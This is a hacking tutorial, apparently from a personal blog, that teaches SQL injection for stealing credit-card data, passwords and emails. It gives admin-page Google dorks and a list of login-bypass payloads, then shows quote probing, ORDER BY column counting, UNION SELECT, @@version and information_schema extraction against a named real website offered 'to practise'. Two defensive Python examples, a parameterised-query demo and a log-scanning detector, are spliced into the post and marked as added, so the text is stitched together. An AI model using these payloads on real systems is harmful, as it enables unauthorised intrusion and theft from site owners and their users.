
SQL Injection [Part 1 & 2]

What is SQL Injection?

Firstly, SQL stands for Structured Query Language. SQL Injection is the first step anyone should take when wanting to hack a website; its power to manipulate a website into doing what an attacker wants is unbelievable and fantastic. Unlike other hacking methods, hacking via SQL Injection is quite advanced and does take a bit of background knowledge to perform. It's simple yet advanced, and gives you great pleasure if done manually. When you "inject", you basically just extract information from tables or columns. Though it might sound fun, I recommend staying protected, as this could lead to up to 1 year of jail time, or even more.


============================================


What Can You Do With It?

With SQL Injection you can easily extract information that is of vital importance to you. This could be anything such as:

CC Information
Passwords
Emails
General Information


The emails can be used for mass spreading, the CC information can be used for cash stealing and the passwords can be used for logging in. Unlike XSS, certain things can go wrong when injecting your vulnerable website. Since most websites remain outdated, it is a website hacker's gift to hack the countless number of vulnerable websites, but it takes work. A lot of work. If a website is vulnerable, you might not know whether it's prone to normal SQL Injection, Blind SQL Injection or time-based SQL Injection. Yes, there is more than one type of SQL Injection. But for now, we'll save you the stress and carry on with normal SQL Injection.

Note: This guide does NOT cover Blind SQL Injection or any other type of injection other than the normal one.

============================================

ASP Hacking

Well, now that we know what SQL Injection is and what it stands for, there is an easier method of hacking a website, though it is not always successful. Let's take ASP first. ASP is quite an easy extension to hack, as it involves an attacker using default input which can sometimes confuse the database until it gives up complete control. Below, we'll explain how this is done.

First, we want to look up some good Google dorks. A dork is a search string that finds pages containing something you are looking for, such as .php?id= or .php?admin= or whatever. Put simply: it's easier than going to a website and looking for a page which has something like .php?id= in it. Some good ones are:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"


Now, when we have connected to the website, it should have the admin page open with Username and Password inputs. Something like this:

[Image: aspsiteadmin.jpg]

Now, we have to get a list of default ASP Passwords, which can be found in the list below.

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'


*The Admin username should be "admin"

Now let's take a brief look at the background of the 1s. Take 0 and 1 for example: 0 would mean "No" and 1 would mean "Yes". If you know binary, you should know this. Take:

Code:
' or '1'='1

Basically, once put into the site, the database would digest:

"Well it could be ' which would let me login this user, but there is a problem, I'll take '1' too."

This is only done with websites that are of low security and outdated. You won't find any luck on those websites with top security.
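To show what the database actually does with the first entry of that list, here is an added example (my own code, not from the original post). It builds a constructed SQLite users table, assembles the login query by string concatenation the way a weak login page does, and then runs the same check as a parameterised query, which binds the input as plain data and so is not bypassed.

```python
import sqlite3


def make_db():
    # Constructed in-memory sample table; the credentials are made up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return db


def build_vulnerable_query(username, password):
    # String concatenation: whatever the user typed becomes part of the SQL text,
    # so a quote closes the literal and "or '1'='1" becomes a real condition.
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    # True when the assembled query matches at least one row.
    return db.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_safe(db, username, password):
    # Parameterised query: the driver binds the input as data, so the quote and
    # the "or" stay inside the string being compared and never become SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def demo(password="' or '1'='1"):
    # Runs both versions against the same input and reports what each decided.
    db = make_db()
    return {
        "sql": build_vulnerable_query("admin", password),
        "vulnerable_bypassed": login_vulnerable(db, "admin", password),
        "safe_bypassed": login_safe(db, "admin", password),
        "safe_real_login": login_safe(db, "admin", "correct horse"),
    }


if __name__ == "__main__":
    result = demo()
    print(result["sql"])
    for key in ("vulnerable_bypassed", "safe_bypassed", "safe_real_login"):
        print(key, result[key])
```

The assembled text ends in `password = '' or '1'='1'`, which is why every row matches; the bound version compares the password column against the literal string and finds nothing.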

Finding SQL Vulnerable Websites

To find an SQL-vulnerable website, as with ASP, we are going to search using a dork. There are a lot of dorks to choose from; an example would be

inurl:page.php?id=


What this basically does is find and list websites with page.php?id= in the URL; as said before, this is what a dork is for. So what we will be doing is using a dork in order to find a vulnerable website. You probably won't get lucky the first few tries, but keep it up and you will be an ace. To help you out, here are some vulnerable websites:



Now that that is out of the way, let's get into injection.

============================================

Injection

Okay, firstly, in order to test whether a website is vulnerable or not, we have to put in a ' (this is known as a "comment"), which will trigger a MySQL error if it is vulnerable. So, you would have this in your URL:

*Use http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 to practise

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10'


If the website is vulnerable, you'll get an error regarding MySQL .. on line ....; the exact error varies from website to website. The page will look something like this:

[Image: vulnerror.jpg]

Finding Columns

Now you will have to find how many columns the vulnerable query on the website has. To do this, you will use a simple comment, which is

Code:
Order by [number] --

until you get an error. The easiest way to do this is to jump between numbers like 15, 20, 25. If you get an error, it means you should check numbers lower than the one above, until a page loads perfectly and the next number in the sequence gives an error.

So it would basically be like this:

Code:
Order by 10-- (No Error)
Order by 11-- (No Error)
Order by 12-- (Error)

This would mean the page has 11 columns, as we got an error at 12.

==

Finding Vulnerable Columns

Okay, now we have the columns, but we need to know which of those columns is vulnerable so we can get the information out of it. In order to do this, we have to put a - sign before the integer (in our case, 10). So it would be

Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10

Now that you have put in the - before the Integer, we need to select the columns that had no error. To do this, we are going to be putting in

Code:
union all select 1,2,3,4... (the number of columns)--

So it would be

Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4... (the number of columns)--

Don't forget to add "--" after the last number. This will trigger the system to give you a list of vulnerable columns that you will be using to extract the information, like so:

[Image: vulncolumns.jpg]


Getting DB Version

We now have the vulnerable columns, but we need to know the DB version, because if it is lower than 5.0 then we will have to guess the table names (which takes a fucking long time). So a pro tip would be to only inject into websites whose DB version is 5.0 or higher.

Okay, so we have found our vulnerable columns; to find the database version, we are going to use those columns to extract it. To do that, we simply put "@@version" in place of one of the vulnerable columns, still keeping the original number of columns we had in the union all select comment.

Note: Let's say we have 5 columns, and columns 2 and 3 show as the ones we can use to extract information; we still need to put in the full 1,2,@@version,4,5-- to get the database version (you can choose either 2 or 3 to put the @@version in, it doesn't matter).

Okay so basically what we are going to be typing is

Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

because we had 11 columns and 8 was the one we wanted to use to find the DB version. If you have followed it correctly, it should look like this:

[Image: dbversion.jpg]

We got 5.0.77, which is higher than 5, so we can continue.

==

Getting Table Names

We now need to get the table names. To do this, we replace "@@version" with "table_name" and, after the last number, add "from information_schema.tables" followed by "--". This will show us the table names. So basically what you're going to do is remove the "@@version" which was put in place of one of the vulnerable columns shown on the screen, and put "table_name" there instead.

Like this:

Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
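For the defender's side of the column-counting, UNION, @@version and information_schema steps above, here is an added example (my code, not from the original post) that scans web-server access-log lines for those request patterns. The log lines, IP addresses and signature names are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (common log format); not from the original post.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /newsdetail.php?id=10 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /newsdetail.php?id=10%27 HTTP/1.1" 500 312',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /newsdetail.php?id=10%20order%20by%2012-- HTTP/1.1" 500 312',
    '203.0.113.5 - - [10/Oct/2023:13:57:15 +0000] "GET /newsdetail.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,@@version,9,10,11-- HTTP/1.1" 200 4980',
    '198.51.100.7 - - [10/Oct/2023:13:58:01 +0000] "GET /newsdetail.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,table_name,9,10,11%20from%20information_schema.tables-- HTTP/1.1" 200 6011',
]

# One pattern per step of the walkthrough above (the signature names are my own).
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.", re.I),
    "comment_tail": re.compile(r"(?:--|#)\s*$"),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')


def analyse_request(uri):
    """Return the sorted signature names matched by the decoded query parameters."""
    hits = set()
    for name, values in parse_qs(urlsplit(uri).query, keep_blank_values=True).items():
        for value in values:
            hits.update(sig for sig, rx in SIGNATURES.items() if rx.search(value))
            # Heuristic: an id-style parameter (id, id_page, NewsID) should be an
            # integer; a stray quote or trailing clause is the earliest, cheapest tell.
            lname = name.lower()
            if (lname.startswith("id") or lname.endswith("id")) \
                    and not value.strip().lstrip("-").isdigit():
                hits.add("non_numeric_id")
    return sorted(hits)


def scan_log(lines):
    """Return one finding per request whose query string matches any signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash on malformed input
        hits = analyse_request(m["uri"])
        if hits:
            findings.append({"ip": m["ip"], "status": m["status"], "uri": m["uri"], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f["ip"], f["status"], ",".join(f["hits"]), f["uri"])
```

The first line (a plain numeric id) produces no finding; the other four are flagged, and the same request that the walkthrough uses to read @@version is reported with both the UNION and version signatures.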

Note:

When copying, clearly credit the source: Dương-UG Blog's
 


Copyright © Dương-UG Blog's - Nguyễn Bình Dương